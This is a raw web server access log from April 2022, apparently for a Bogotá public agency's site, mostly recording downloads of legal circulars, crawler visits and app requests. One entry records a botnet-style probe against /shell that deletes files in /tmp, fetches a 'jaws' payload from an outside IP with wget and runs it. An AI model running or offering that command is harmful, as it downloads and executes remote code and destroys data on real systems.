172.22.2.4 - - [16/Apr/2022:17:32:12 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=4843&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 1029
181.53.13.95 - - [16/Apr/2022:17:32:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX193C7RE7vX7EiJ2bp6I2iJL93FXJPvfUz0hAYRlA69J2swF6g3/SSiRlOQDzFCQQ9FzgIACkxV6Kdg6phE3RRTvH/NjNewtjbo9I7OMxya1/Y7E/WwZIDRKXfNtYN3EC1/HWfUpKWrU2ZDHAtJXDZN1TkrVGzbL8Fakq1Mfg/btRNaW+T5jD6NY9XrJ0v5nL2kJelZas1/2F3zONlXqsJDBlk9hlGQ2ioVBTvYyUMETOfW7FmweUVoy2vthP/h4AIK0gyZ8ge44K7VMGU8PJT4cOeEUAEUnr9U=&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 25
181.53.13.95 - - [16/Apr/2022:17:32:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19oFq95xc6ZATJP8BTERy4AbSYWxN90zx8AQc7Nty3YnrfB6Eim/ikDUJwgbjUJYrfP2vmu3mcO2lsW+g1LQsEbdJGu1XmHUd/33dOvOzTrVvJZ5eWlF0YWD4ZKaAzkvFmxPzSH7/cTsQVy/p8/I7/NWllR6eeDujZGxsFZH9VZnEM5we35e2HIkqA69IJ7UAbsTKRZCyemQZo5fcxURyGl7MIK+LYLr8qDUGXzEfU8EoI9D5z2QGp52gfySxUAoRkGmezHRu/SHibOJhRsW9JTJJ552ZB5QdzpVs4eyRqir3nNmIs2XUys7fFyeiOIUbLY3Dzmkgjvod2lUtCxgUIHOM6cR7qq6wkZ3hno241DT0SM3p9sDgqtABX3tFFPAcAVadEACfuDqoooxS1lpd0I/b8H2tRR/c2eHKHOKYyJ+IWvR5qFbs67/mOjGVZr15vfUFnY2sPZQ2UojMkvrgbKQjpstSZ9Zj04A5cxZIgKVuPwJqnyIVuGneEjuuQ/rHsqPeQL4vCzJ9ExUBb9VEaOp/6E9qYzFaL01+gJQUik3vfg1yiqFUQ327JGU6lmhmrE1oJzG5Yj0UavIcsWfYi1mgAD7xZ0oPCN7I3B9IyUGbOIp1TeqklZNm9keni2VLc8WxZbih2uD6Am1MvxF4hAs5eYbpcSTWjFIwudEWR98SPE3b5FjFE7ALzCVeXU4vCU5CrjhhikbVf6J/amzc5W6r2n7GJsmLNi/alsCsN+nEwkfJApElZvMvhxe8X5atKNC6tj8i81EW5qlruvRfs8i5wQHJNrIzCvVo/sg0CGn+oSRA074b74z68Rm6z6FQPOIXmmvY1H68J//sMCOTHT+b37OH5ar2Od8BqWeKxlVA5pwPHgR/jxVkkbwCdNpEmMOr61xJQ74HjYQlqxqlUEnuwhcuwOVRbzJ9Ns8rhS50VeEXSBG6n3yOYtjhId77vMCrRW1kvHnMqqlAY0IOUNUL4a2EFKJAcz87FwL5Xo628aOeVYGMXpd53l+MX6Z9JwElCKVBhbpD4fF07EBxCDug7BGnypevJROehh/b9TDKGfjGqKyctm8ZlD040Fqn+7eRQqrwrEDBvOHGNzkT8oR6Oal2rzQR2qQeQnNFtzm9B/bZP7MtgWJ6PChqNQ0nIGJp2AkWBrlataVJMLoGSwBkwJx2BxUq2Gcbke++c76qYxTLko2PbzDX2eh51V38S6+5TBddF98yUiH+5G8D5MyXhqQeu3yLkQhSUBIMCXtQzqt/VcW19W5WuKlKGwuzl1lbpNxgjB9Y1jmGeN78WoiwiQ1SObV1O12m29JDvSYmg7GA3NB97qgRvT8bhQaRpHfCzyHG2Ru4719hSw/Ums7dsYJCUHyMYZCMwWpM5KEGcPUfMTSWgiTdWrqU4nl/xEnMBI3KVzm2C+tyYslt+PQijNd7t/eJUhNEOieun2GhTAWPRzdKCiMdu08QghJp7jr4aWitXaXbcvserII9Inne/mRJKHg3q7SJsr/0Y+N6FAfrIJEm9QJurFX+d/yWi/InkQyaQoGSJ36y7cTWU7e8QLcEsP3YrBkEsqtJE3A5Pp9bLFfeyDKplTzPHujqxNMMIw4XTkGg==&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 25
181.53.13.95 - - [16/Apr/2022:17:32:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+wfC54MdvyMPB5jV/Fd1rmnMHIXT5+BRHXLeOR4O9tp22jgBisRoP5/ZZDFJEHtJJZuWJh4mooOoD5haoPdq0BcdmlyI4QxSlk6z0qHf03VvQiNCJBa/2deqMDJW+F3aS7nJFLt5u8ISJYaTOyroIfYfgq2yHSZp4=&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 25
181.53.13.95 - - [16/Apr/2022:17:32:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19i+NVu0lR5f1csq/dGUnilYxzhViOb84t1Xpm6A1MM1Qz0fa2V144LsKMqzj1x2IPAyCNsIeIhCT/h8BKmDFP5+CJgEAMPV5UxaEQSaCf57n5xR8SF9wvBcjIKeA8qQA8rWNVV7ddkiINoH+gjO1ZbTt8xRlHZXoo=&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 25
181.53.13.95 - - [16/Apr/2022:17:32:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19ycinu023+fkpG1EAtvm9D1KYF1Jmylg3EVk/73SYTtPdj+SytvBiT09gH39Q4yWQaeZVswM39jZ+EA9M1eFLtgcgixpdak0ezsXo+59JM/aL6uJK63xRh+cZguO6m0JukpNs7D7Pb+qE/pdrQsjH05G8xs6N92m8=&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 25
181.53.13.95 - - [16/Apr/2022:17:32:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18JkinGL02f2AxsRmseGXN570jIpnXJ6z2Qkel9THVbQFnALtTY4zUKF41RIwo3LOntdWQ9FPDTOFrAb705cf+1Vtj+wDmfbO5147NX8DfekXFG7ESSpksh7I5K7Df9WjoVl5gTvTqhN5tyZdQ3mn+EjI19NsplHRSiC0gUhh37yWjhNp3ekDfJAbA+xLoPlNpayJE+xHtZzg==&u=U2FsdGVkX19tBnh5RCDpeO1l34S0R2UpeVche30DPwYMPBGMcjLUTYnD7pBAxZnq&y=U2FsdGVkX19K4UyCMg/LuA6BhaN+uCJCt7bWACBE4pEKyspgoSvwSTQfdF+U4tVd HTTP/1.1" 200 25
172.22.2.4 - - [16/Apr/2022:17:31:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Apr/2022:17:33:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Apr/2022:17:32:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45628
201.245.192.253 - - [16/Apr/2022:17:33:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45478
172.22.2.4 - - [16/Apr/2022:17:33:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47760
172.22.2.4 - - [16/Apr/2022:17:33:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47414
172.22.2.4 - - [16/Apr/2022:17:35:37 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C-1007-2011-1.doc HTTP/1.1" 304 -
172.22.2.4 - - [16/Apr/2022:17:35:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61796
216.245.221.92 - - [16/Apr/2022:17:38:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.17 - - [16/Apr/2022:17:38:24 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:17:37:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:37:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
172.22.2.4 - - [16/Apr/2022:17:39:45 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [16/Apr/2022:17:39:47 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 200 320793
172.22.2.4 - - [16/Apr/2022:17:39:53 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [16/Apr/2022:17:40:00 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000006%20DEL%2005%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 249615
172.22.2.4 - - [16/Apr/2022:17:40:05 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
172.22.2.4 - - [16/Apr/2022:17:40:13 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 200 422655
172.22.2.4 - - [16/Apr/2022:17:40:19 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 200 307959
172.22.2.4 - - [16/Apr/2022:17:40:24 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000014%20del%2001%20de%20septiembre%20del%202020.pdf HTTP/1.1" 200 320826
172.22.2.4 - - [16/Apr/2022:17:40:32 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 344384
172.22.2.4 - - [16/Apr/2022:17:40:38 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 200 674401
172.22.2.4 - - [16/Apr/2022:17:40:45 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [16/Apr/2022:17:40:51 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 159877
172.22.2.4 - - [16/Apr/2022:17:40:56 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 200 164676
172.22.2.4 - - [16/Apr/2022:17:41:02 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000020%20del%2020%20de%20diciembre%20de%202019.pdf HTTP/1.1" 200 145170
172.22.2.4 - - [16/Apr/2022:17:41:08 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
172.22.2.4 - - [16/Apr/2022:17:41:15 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [16/Apr/2022:17:41:18 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2011%20del%2024%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 169541
172.22.2.4 - - [16/Apr/2022:17:41:22 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
172.22.2.4 - - [16/Apr/2022:17:41:28 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%200015%20del%207%20de%20Diciembre%20de%202018.pdf HTTP/1.1" 200 165305
172.22.2.4 - - [16/Apr/2022:17:41:34 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 200 515008
172.22.2.4 - - [16/Apr/2022:17:41:41 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%202%20del%201%20de%20Septiembre%20de%202017.pdf HTTP/1.1" 200 152575
172.22.2.4 - - [16/Apr/2022:17:41:48 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%201%20del%2030%20de%20Marzo%20de%202017.pdf HTTP/1.1" 200 668532
172.22.2.4 - - [16/Apr/2022:17:41:54 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 309906
172.22.2.4 - - [16/Apr/2022:17:42:00 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
172.22.2.4 - - [16/Apr/2022:17:42:06 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
172.22.2.4 - - [16/Apr/2022:17:42:12 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 200 660637
172.22.2.4 - - [16/Apr/2022:17:42:18 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%203%20del%2014%20de%20Noviembre%20de%202014.pdf HTTP/1.1" 200 104132
172.22.2.4 - - [16/Apr/2022:17:42:23 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%202%20del%2021%20de%20septiembre%20de%202014.pdf HTTP/1.1" 200 143376
172.22.2.4 - - [16/Apr/2022:17:42:28 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%201%20del%2008%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 180124
172.22.2.4 - - [16/Apr/2022:17:42:33 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%208%20del%201%20de%20Noviembre%20de%202013.pdf HTTP/1.1" 200 385156
172.22.2.4 - - [16/Apr/2022:17:42:43 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [16/Apr/2022:17:42:49 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 200 4210437
172.22.2.4 - - [16/Apr/2022:17:43:07 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
172.22.2.4 - - [16/Apr/2022:17:43:13 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%204%20del%2005%20de%20junio%20de%202013.pdf HTTP/1.1" 200 130461
172.22.2.4 - - [16/Apr/2022:17:43:17 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%203%20del%2005%20de%20abril%20de%202013.pdf HTTP/1.1" 200 93580
216.245.221.92 - - [16/Apr/2022:17:43:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:43:21 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 200 85466
172.22.2.4 - - [16/Apr/2022:17:43:28 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%201%20del%2014%20de%20enero%20de%202013.pdf HTTP/1.1" 200 1298384
201.245.192.253 - - [16/Apr/2022:17:42:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45628
172.22.2.4 - - [16/Apr/2022:17:43:35 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1402289
172.22.2.4 - - [16/Apr/2022:17:43:43 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%208%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 963197
172.22.2.4 - - [16/Apr/2022:17:43:50 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 972955
172.22.2.4 - - [16/Apr/2022:17:43:57 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%206%20del%2025%20de%20Mayo%20de%202012.pdf HTTP/1.1" 200 387391
172.22.2.4 - - [16/Apr/2022:17:44:02 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%205%20del%2027%20de%20Abril%20de%202012.pdf HTTP/1.1" 200 216613
172.22.2.4 - - [16/Apr/2022:17:44:09 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 200 253045
172.22.2.4 - - [16/Apr/2022:17:44:14 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%203%20del%2023%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 572950
172.22.2.4 - - [16/Apr/2022:17:44:19 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%202%20del%2014%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 113666
201.245.192.253 - - [16/Apr/2022:17:43:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45478
172.22.2.4 - - [16/Apr/2022:17:44:25 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2016%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 381186
172.22.2.4 - - [16/Apr/2022:17:44:30 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2015%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 486506
172.22.2.4 - - [16/Apr/2022:17:42:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:44:36 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
172.22.2.4 - - [16/Apr/2022:17:44:47 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 351421
172.22.2.4 - - [16/Apr/2022:17:44:52 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 369945
172.22.2.4 - - [16/Apr/2022:17:45:13 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2011%20del%2027%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 526945
172.22.2.4 - - [16/Apr/2022:17:43:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57542
172.22.2.4 - - [16/Apr/2022:17:45:37 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [16/Apr/2022:17:45:39 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
172.22.2.4 - - [16/Apr/2022:17:45:46 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 200 1118749
172.22.2.4 - - [16/Apr/2022:17:45:53 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%209%20del%2003%20de%20Noviembre%20de%202011.pdf HTTP/1.1" 200 54568
172.22.2.4 - - [16/Apr/2022:17:45:59 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 285158
172.22.2.4 - - [16/Apr/2022:17:46:05 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 200 1107785
172.22.2.4 - - [16/Apr/2022:17:46:14 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2015%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 314873
172.22.2.4 - - [16/Apr/2022:17:46:20 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 262144
172.22.2.4 - - [16/Apr/2022:17:46:30 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 252800
172.22.2.4 - - [16/Apr/2022:17:46:35 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 1488992
172.22.2.4 - - [16/Apr/2022:17:46:43 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
172.22.2.4 - - [16/Apr/2022:17:46:50 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 399895
172.22.2.4 - - [16/Apr/2022:17:46:55 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 601047
172.22.2.4 - - [16/Apr/2022:17:47:00 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2023%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 1452758
172.22.2.4 - - [16/Apr/2022:17:47:05 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2016%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 346378
172.22.2.4 - - [16/Apr/2022:17:47:11 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2031%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 496778
172.22.2.4 - - [16/Apr/2022:17:47:18 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2026%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 644194
172.22.2.4 - - [16/Apr/2022:17:47:24 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%201%20del%2012%20de%20Abril%20de%202011.pdf HTTP/1.1" 200 366269
216.245.221.92 - - [16/Apr/2022:17:48:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:48:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:49:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [16/Apr/2022:17:53:18 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.14 - - [16/Apr/2022:17:55:37 -0500] "GET /portaldeninos/humedal-torca-y-guaymaral-2/ HTTP/1.1" 200 80665
172.22.2.4 - - [16/Apr/2022:17:54:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:17:56:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62201
186.30.14.119 - - [16/Apr/2022:17:58:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.30.14.119 - - [16/Apr/2022:17:58:17 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.30.14.119 - - [16/Apr/2022:17:58:17 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [16/Apr/2022:17:58:18 -0500] "HEAD / HTTP/1.1" 200 -
41.45.155.63 - - [16/Apr/2022:17:58:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.159/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
207.46.13.115 - - [16/Apr/2022:18:00:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342653
216.245.221.92 - - [16/Apr/2022:18:03:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:18:02:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48908
172.22.2.4 - - [16/Apr/2022:18:03:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49344
103.203.56.1 - - [16/Apr/2022:18:05:22 -0500] "GET / HTTP/1.1" 200 319
66.249.65.13 - - [16/Apr/2022:18:05:25 -0500] "-" 408 -
216.245.221.92 - - [16/Apr/2022:18:08:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:18:08:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 42982
172.22.2.4 - - [16/Apr/2022:18:08:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 42982
216.245.221.92 - - [16/Apr/2022:18:13:18 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:18:12:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:18:13:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
198.74.59.35 - - [16/Apr/2022:18:15:43 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
198.74.59.35 - - [16/Apr/2022:18:15:43 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
198.74.59.35 - - [16/Apr/2022:18:15:43 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [16/Apr/2022:18:18:18 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.23 - - [16/Apr/2022:18:18:28 -0500] "GET /images/eficiencia-energetica-11-marzo.jpg HTTP/1.1" 200 46478
69.171.251.118 - - [16/Apr/2022:18:18:32 -0500] "GET /images/pieza-global-day-5-octubre.jpg HTTP/1.1" 200 242505
172.22.2.4 - - [16/Apr/2022:18:18:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.33.88.63 - - [16/Apr/2022:18:20:59 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.33.88.63 - - [16/Apr/2022:18:20:59 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
45.33.88.63 - - [16/Apr/2022:18:20:59 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.156.236.189 - - [16/Apr/2022:18:21:05 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
191.156.236.189 - - [16/Apr/2022:18:21:05 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 304 -
191.156.236.189 - - [16/Apr/2022:18:21:05 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 304 -
191.156.236.189 - - [16/Apr/2022:18:21:06 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 304 -
191.156.236.189 - - [16/Apr/2022:18:21:06 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
191.156.236.189 - - [16/Apr/2022:18:21:28 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
191.156.236.189 - - [16/Apr/2022:18:21:38 -0500] "POST /appsia/controlador HTTP/1.1" 200 7797
35.204.175.154 - - [16/Apr/2022:18:21:41 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Apr/2022:18:20:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
172.22.2.4 - - [16/Apr/2022:18:20:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
191.156.236.189 - - [16/Apr/2022:18:22:07 -0500] "POST /appsia/controlador HTTP/1.1" 200 6670
191.156.236.189 - - [16/Apr/2022:18:22:09 -0500] "POST /appsia/controlador HTTP/1.1" 200 10596
216.245.221.92 - - [16/Apr/2022:18:23:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Apr/2022:18:22:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45629
201.245.192.253 - - [16/Apr/2022:18:23:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45482
172.22.2.4 - - [16/Apr/2022:18:24:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
